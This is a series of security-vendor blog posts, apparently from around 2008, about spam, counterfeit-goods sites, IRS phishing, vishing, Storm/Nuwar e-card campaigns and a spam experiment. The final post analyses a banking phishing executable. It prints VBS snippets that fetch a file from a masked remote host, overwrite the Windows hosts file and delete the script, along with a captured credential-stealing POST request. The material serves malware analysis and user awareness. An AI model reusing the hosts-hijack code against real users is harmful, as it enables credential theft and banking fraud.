In addition to ever more creative ways to block received spam, is an upgrade to the SMTP protocol answer? Or do we need more government legislation? Or is it something else altogether? Will it take another 30 years to put spammers out of business? I sure hope not!

A recent report by the OECD (Organisation for Economic Co-operation and Development) indicated that counterfeit and pirated goods in 2005 could have had a value of up to 200 billion U.S. dollars.

One path to fake goods is via spam, which frequently offers counterfeit medicines and replica watches. A recent post from the French CERT-LEXSI blog caught my attention regarding fake luxury mobile phones selling for absolutely unbeatable prices.

These phones are normally manufactured by Vertu, a British subsidiary of Nokia, and are sold in luxury shops in Monte Carlo, Cannes, or Beverly Hills. On their official top-quality site (www.vertu.com), prices are not mentioned, but by visiting some authorised retailer Web sites I found exorbitant figures. Some mobiles, bedecked in gold and diamonds, exceed $90,000. Really too expensive for me!

Using Google, it’s really easy to find fake sites offering these counterfeit marvels. In fact it is easier to find the fake sites than the authorized ones!

And the prices–assuming you need one of these–are attractive: less than $1,000 for a copy of an original that sells for $97,300.

Regular spam campaigns promote such Vertu “replica” sites. Be vigilant, however, because appearances can be deceiving. Sites are numerous and their common feature is their high-quality, professional look–with black backgrounds that imitate the official site.

These sites are hosted at various providers in various countries (USA, Germany, and Hong Kong). Some of them seem clean; others are known for bulletproof hosting services and their relationship with the Russian Business Network, an alleged cybercrime organization. The registrars are also diverse (Estonia, Russia, and Korea) but more questionable. It is surprising that these do not require any name verification before accepting registrations. But once you know that a lot of spam and malware-related Web sites come from them, their permissiveness is easier to understand. Registrant addresses and e-mails give us an inkling regarding the nationality of their owners: China and Russia.

For the potential buyer, the key issue concerns the risk. The Swiss Watch Industry clearly points out that the buyer is the first victim, because purchasing counterfeits is:

• Agreeing that piracy is OK; the counterfeiter seeks to appropriate somebody else’s hard work and investment.
• Supporting and financing organized crime; links between counterfeiting activities and criminal networks have been established in many cases.
• Accepting underground and child labor.
• Endangering your own health and safety; the risk is real with medicines, aircraft and auto spare parts, medical supplies, and cosmetics.
• Reducing employment and stifling growth; this form of criminality contributes to the reduction of employment, which is estimated to cost more than 200,000 jobs worldwide per year.
• Being liable to criminal sanctions; the buyer may face criminal and financial sanctions. The mere possession of counterfeits is illegal in many countries. Furthermore, penalties could be claimed by legitimate intellectual property rights’ owners. Customs also can seize and destroy illegal items and assess fines.

And if these considerations don’t stop you, remember you run the risk of not receiving the goods you pay for; instead you might have your banking details stolen and reused in future malevolent activities. None of the sites I visited yesterday offered a secure Internet payment system; one of them housed a hidden Iframe linked to a known password-stealing Trojan.

The Internal Revenue Service (IRS) is some phishers favourite target, especially during the tax season each year. We first saw IRS phishing emails in our spam traps in 2005 and have seen them every year since, particularly when the U.S. tax year comes to a close.

Does the early bird catch the worms?

Who would consider a tax issue as early as in September? The phishers must think someone would. We started to see IRS phishing e-mails as early as September last year. The volume has increased in the following months, with a sharp increase in January 2008, and is showing no signs of abating today.

Targeting both individuals and businesses

Most IRS phishing e-mails target individuals, but there were several campaigns which targeted business/corporate accountants and treasury managers this year. The phishing e-mails claimed that there were some recent changes to business and corporate tax laws and asked the recipient to download the relevant files by clicking the embedded links.

Using an IP address instead of a normal domain name is commonly seen in phishing e-mails, because the phishers want to hide the phish domain name from the recipients eyes. In the sample below the phisher also claims that the encoded IP is a document reference and the phishing uri is a personalized link.

Common characteristics of an IRS phishing e-mail

The IRS phishing e-mails normally have a faked “From:” header to try to let the recipients think it is from the IRS. The message body part usually begins with different variations of the IRS logo. They usually follow this with how much money you are supposedly to be refunded for the year. Then the recipients are asked to fill a tax refund form by clicking a link which is normally hidden behind text, such as “Please click here”. The link will lead the recipients to an online form which requests personal information such as Social Security Number, Name, Address, Date of Birth, mother’s maiden name, Bank account number, Credit card number, Expiration date, Card verification number, ATM PIN number and name of the issuing bank.

Recently some phishers have enclosed a html attachment to the e-mail rather than including a link to a phishing web site, and have asked the recipient to open the attachment and submit the details via the attached form.

We also spotted an IRS Vishing (short for “voice phishing”) campaign this year.

All in all it has been a busy tax season for the IRS phishers. The IRS give some helpful tips on how to avoid being caught out by these types of phishing emails on their web site.

Meeting the German participants of the McAfee SPAM Experiment for dinner yesterday turned out to be very interesting and provided some unexpected results. After 14 days living on a Spam-mail diet they are still in good shape. Some are so into it that they even installed SiteAdvisor to find out, in advance, if a site is likely to send you spam when you leave your email address there…

Getting in trouble with the girl-friend for browsing dating web sites while leaving his mail-address for possible use by spammers was one of the less expected (and desired) results.

And then this: Collecting spam through surfing porn sites really does not work! All who tried told me they didn’t receive much spam when leaving their email on such sites. That really was a surprise for me. I would have expected a lot of spam, as there seems to be a fairly obvious link between porn and certain drugs and enhancement pills…

Constantly living in a world full of (empty) promises seems to have some effect as well: “It’s nice sitting here with you, but soon I’ll be hanging out with Tom Cruise and Jessica Alba and I will even get money for it” – it’s amazing what some shady people promise you, just to get your email address and other personal data.

There was some amazement when two participants figured out they had received nearly identical advance-fee scams: One in English, the other one in the Polish language.

Well, I’m sure all participants will have a lot of interesting experiences and stories to share at the end of the experiment and I sincerely hope they manage to stop clicking on all those ‘you are the 100,000,000,000 visitor of this webpage’-banners

Oh, and a last note: If there is one movie you should watch this year, make sure it’s the Futurama: Bender’s Big Score where Spam and Phishing play key elements in the story!!

A recent article in The Register seems to imply that if you’ve got out-of-date security software, any fraudulent charges to your accounts could suddenly be your liability. The advice given by the British Bankers’ Association includes much more than just the state of one’s security software; this could just as easily include misaddressing a check or falling victim to a phishing attack, among other things. On the other hand, it’s highly unlikely it would ever be worth the bank’s effort to invoke this clause.

From the Banking Code of the British Bankers’ Association

12.11 If you act fraudulently, you will be responsible for all losses on your account. If you act without reasonable care, and this causes losses, you may be responsible for them. (This may apply, for example, if you do not follow Section 12.5 or 12.9 or you do not keep to your account’s terms and conditions.)

These two sections offer quite a few bullet points about how not to be a victim of identity theft or financial fraud.

12.5
• Do not keep your checkbook and cards together.
• Do not let anyone else use your card, and do not tell anyone else your PIN, password, or other security information.
• Your bank or building society will never ask you for your PIN. If you are in any doubt about whether a caller is genuine or if you are suspicious, take the caller’s details and call us.
• If you change your PIN, you should choose your new PIN carefully.
• Try to remember your PIN, password, and other security information, and securely destroy the notice as soon as you receive it.
• Never write down or record your PIN, password, or other security information.
• Always take reasonable steps to keep your card safe and your PIN, password, and other security information secret at all times.
• If your card issuer takes part in a secure online payment system (such as Verified by Visa or MasterCard SecureCode), consider signing up either at their Web site or whenever you are given the option while shopping online. This involves your registering a password with your card company; you will be asked for the password whenever you shop at an online retailer taking part in the scheme. You should keep this password secret.
• Never give your account details or other security information to anyone unless you know who they are and why they need them.
• Keep your card receipts and other information about your account containing personal details (for example, statements) safe and get rid of them carefully.
• Take care when storing or getting rid of information about your accounts. People who commit fraud use many methods, such as “bin raiding” (a.k.a., dumpster diving) to get this type of information. You should take simple steps such as shredding printed material.
• Be aware that your mail is valuable information in the wrong hands. If you don’t receive a bank statement, card statement, or any other expected financial information, contact us.
• You will find the APACS Web site a helpful guide on what to do if you suspect card fraud.

12.9
• Keep your PC secure. Use up-to-date anti-virus and spyware software and a personal firewall.
• Keep your passwords and PINs secret.
• We (or the police) will never contact you to ask you for your online banking or payment card PINs, or your password information.
• Treat e-mails you receive from senders claiming to be from your bank or building society with caution and be wary of e-mails or calls asking you for any personal security details.
• Always access Internet banking sites by typing the bank or building society’s address into your Web browser. Never go to an Internet banking site from a link in an e-mail and then enter personal details.
• Follow our advice: Our Web sites are usually a good place to get help and guidance on how to stay safe online.
• Visit www.banksafeonline.org.uk for useful information.

But wait, there’s a caveat: They won’t invoke this willy-nilly:

12.12 Unless we can show that you have acted fraudulently or without reasonable care, your liability for your card being misused will be limited as follows.

This code would be far too difficult and costly to implement in most cases. It would have to be a particularly large sum of money involved in the fraud, enough that it might be deemed worth the cost of an investigation, alienating a customer, and courting a heap of bad PR.

Although this is all good advice from the BBA, it looks like the assertion that people will suddenly be financially liable for having out-of-date security software is just a case of spreading FUD.

It’s déjà vu all over again with the latest Nuwar campaign over the weekend offering belated Valentine e-cards. The malicious e-cards contain a URL to random blogspot.com pages sporting a love theme linking to the Storm executable. The bait pages by themselves do not contain any exploits and rely solely on end-user interaction to click and install the malware. The executables being offered are “love.exe” and “withlove.exe” – both being hosted on a fast-flux domain. A copy of the BlogSpot pages hosting storm is shown below.

This is not the first time BlogSpot.com has been abused to host malware laced pages. Zlob a.k.a Puper Trojan did that last year and also spam messages these days contain Google’s Blogger links to blogspot.com that do simple forwards to the spammer’s domain.

But why would the Nuwar gang launch a Valentine-themed campaign in April? Either the Storm authors are suffering from acute Valentine hangover or have their holiday calendar messed up! Especially since Easter passed off surprisingly quietly without a Storm

Within the first 24 hours, participants in McAfee’s SPAM Experiment have already started to receive a wide range of spam. The U.S. economic crunch (bearing in mind I am NO economist ) may be having an effect on spam campaigns, as several of the recipients, browsing the Web and working independently of each other, have started to receive offers that center around guaranteed loans, credit cards, and debt relief.

The spam that isn’t offering money is trying to take it away from the participants. Three of our “victims” have already been targeted by phishers! It didn’t take long at all for some of their e-mail address to be picked up and exploited by fraudsters.

According to their blogs, some of the participants started to receive spam almost immediately after they clicked on pop-ups on the first day and provided their e-mail addresses for free offers! As usual with the free offers it turns out that it’s almost impossible to meet the conditions to get the free Xboxes, Wiis, iPods, iPhones, etc.

At the time of this writing, the overall spam submission counts have exceeded 550 from 17 of the participants. One participant alone has received more than 130 pieces of spam!

More to come during the next 29 days. Make sure you follow the participants blogs and stay tuned.

Take equal parts e-mail, willing and daring participants, some shady ePharmacies (OK, OK–it’s Viagra), a few eCards, and a heavy dose of dubious business activities. Mix them together with just a sprinkle of reality TV (or blogging in this case) and you have The S.P.A.M Experiment, which launched this week.

Avert Labs invests quite a bit of resources in fighting spam and educating users about fighting spam. Anyone who follows this blog certainly knows that. The purpose of this experiment, however, is quite different. It is to show spam for what it really is: dangerous. Spam is not just a nuisance. It’s a constantly evolving threat to our identities and our wallets. Spam can put users at risk of far more than just lost inbox space. And to show spam for the threat it really is, we are actually having users do what we always tell them not to do!

Come on. You gotta admit it. It is very cool.

The S.P.A.M. Experiment is designed to show the scale of the problem of spam and the risks associated in opening or responding to unsolicited e-mail. It will demonstrate just how resourceful and quick cybercriminals (and make no mistake here–spammers are criminals) are to create new ways of evading anti-spam filters and relieving people of their money. The worldwide participants will be sharing their experiences through blogging so you will be able to follow the action as it develops. I recommend you subscribe to the many global feeds that are here. We started only earlier this week and the participants are already getting results!

Want to know why spam is dangerous? Want to see how spam links to cybercrime? We are gonna show you over the next 30 days.

Yes, today is April Fool’s Day and the usual pranks are circulated through the net. Some funny. Some not so funny. And some very intriguing ideas.

Offensivecomputing.net, a site dedicated to malware analysis, suddenly looking like one of the current Nuwar Campaigns, was complete with file downloads (though benign ones) that may have left many users staring at their screens. I did not link directly to them, because including links here that result in executables being automatically downloaded is not a good idea (plus it’s their main page, likely to be changed back in some hours).

But the really interesting idea came from Google: An engine to search tomorrows web, today! Finding out what website will sport malicious downloads the next day, knowing what websites will fall victim to the ongoing Mass Hacks (reported on here and most recently by Dancho Danchev) within the next 24 hours……. That would be so priceless!

But then Google took Security Nightmares to a next level with another idea: Sending Email back in time. While that feature would be a Spear Phisher’s dream come true, I am rather happy it’s not real.

In a natural evolution of phishing, Internet scamsters are switching to “Vishing” — short for “voice phishing” in order to steal user information. Vishing combines the use of Voice over IP (VoIP) phones along with clever social engineering to gain access to personal and financial details of the victim by exploiting the perceived trust in traditional telephone services.

With increased user education about Internet scams, people are more aware of the fact that an e-mail containing a URL could be malicious in nature. Instead of using a misdirected Web link to some phony banking sites to steal user information, fraudsters are luring victims to something more credible like calling a toll free number and having an automated recording asking for account information.

Potential victims would get the usual convincing e-mail phish conjured to look like a genuine complaint. But instead of being directed to a website to resolve the pending issue, they are given a phone number to call. Those who call the “customer service” number are greeted with a pirated recording of an automated voice system for the targeted financial institution and are requested to enter their card number in order to authenticate. They are then led through a series of voice-prompted menus that ask for PIN codes, card expiration date, date of birth and other critical information. Once the victim enters these details, the visher has enough information to use it for identity theft and make fraudulent use of the information.

With the US tax deadline nearing, McAfee Avert Labs has observed a surge in IRS refund phishing attempts. In addition to the usual e-mail phish we also observed IRS vishing campaigns targeting VISA or MasterCard debit cards.

Here’s another example of a vish campaign targeting a well known bank.

Other variants of vishing use CallerID to spoof an incoming call to appear as an 1-800 number or SMS messages purporting to be from a bank. A text or pre-recorded voice message is then played out, persuading the victim into believing that their account has been frozen due to suspicious activity. As the incoming call would display a 1-800 number from a recognized institution, it creates a false sense of security about the authenticity of the message.

Vishing is all set to flourish with advancements in Voice over Internet Protocol (VoIP) technology that enables cheap and anonymous Internet calling. Given the ease with which CallerID boxes can be tricked into displaying erroneous information, it is becoming increasingly difficult to distinguish phishing attempts from genuine attempts to contact customers.

If you encounter a vishing attempt and have a question concerning your account or card, please contact the financial institution only using a telephone number obtained from your account statement, a telephone book or other verifiable, genuine correspondence.

In “celebration” of tomorrow being April Fool’s Day, the people behind Nuwar a.k.a. Storm have launched a new E-mail spam campaign. An E-mail with a subject and a short body text like “Happy April Fool’s Day!” or similar would have a usual, for Nuwar anyway, all-numeric-IP http link. Following that link brings up a page like this:

If you wait those 5 seconds, it’ll try to download file funny.exe to your computer. If you click on the image, it’s kickme.exe. And if you click on “click here” it’s foolsday.exe. All of them are nothing but a new Nuwar variant.

A few days ago McAfee Avert Labs came across yet another example of how effective and especially dangerous phishing can be. We received a sample in the form of an .exe file that when executed would start Internet Explorer and present the login page of a well-known Italian bank.

At first sight, for the inexperienced and security-unaware user, the Web site looked exactly like the real thing. There were no obvious signs of fraud as “only” the user name and password to get into the banking page were requested. Once these initial credentials were inserted, a second page requested a card number, the expiration date, and the CVV2/CVC2 number. After this, you guessed it, a simple message–”Wrong details, try again!”

What actually happened is that the sample creates the file finaltemp.vbs and runs it immediately via the Windows Script Interpreter, wscript.exe. The VBS script is immediately removed from the system. Here are some interesting snippets of the code embedded into the executable:

Set WshShell = WScript.CreateObject("WScript.Shell")
strURL = http://x.x.x.x/twiki/b.txt
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")

More code creates some objects used to write the contents of the file through HTTP requests using Microsoft.XmlHttp.

fileToCopy = fso.GetSpecialFolder(WindowsFolder).Path & "\system32\drivers\etc\hosts"

This will copy the content of the b.txt, seen above, to the host file–leading to compromised name resolution!

WshShell.Run "iexplore.exe"
Set aFile = fso.GetFile(strOutFile)
aFile.Delete

This will run Internet Explorer, opening the main page of the bank with what looks like the correct address for the bank in the browser’s address bar; however, this ultimately points to the bad IP set in the modified host file. At this stage the unaware user enters his or her information on the page, which gets sent to a remote location that is certainly not the secure bank environment. All of this happens silently–without any popping cmd shells, active objects complaints from IE, or any other suspicious activity.

If we look at a packet-sniffer trace, we can see the POST request made to the URL mentioned in the snippet above. It was registered through (no kidding!) Godaddy.com. Also we will see all the requests made to the IP written to the host file that was modified by the VBS script–including a POST containing the username, password, card number with the security code, and expiry date. (In this case you can see that the Avert Labls account with password “testing” is now officially owned.)

POST /index.php?MfcISAPICommand=ProcessCC&UsingSSL=1&login=AVERTLABS&
pass=TESTING HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://X.X.X.X/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: poste.it
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache

Session=cvv2.gif&password=TESTING&ccnumber=6666666666666666&
month=10&year=10&
cvv=666&__EVENTTARGET=RicaricaCartaPPayPagamentoPPayEdit1%3AbtnContinua&__EVENTARGUMENT=HTTP/1.1 200 OK
Date: Fri, 14 Mar 2008 18:00:39 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8
X-Powered-By: PHP/5.2.0-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

It seems that phishing will remain a part of our daily lives. And what is most alarming is the ease with which someone could change a few lines of the scripts to redirect the user to whatever site that requires authentication and grab very sensitive information which could be use to steal money as well as any other type of information.

So far the Web site hosting the modifications required for the host file and the IP hosting the fake pages are still live and sending data, so you can imagine how much could be gathered in just a few days or even a few hours. The reverse DNS details for the IP appear to be forged. We have contacted the owner of the IP and the bank itself to investigate further and have the fake site shut down as soon as possible.
Visit.geocities.com and geo.yahoo.com were involved, as well, probably for tracking purposes.

Safe banking, folks!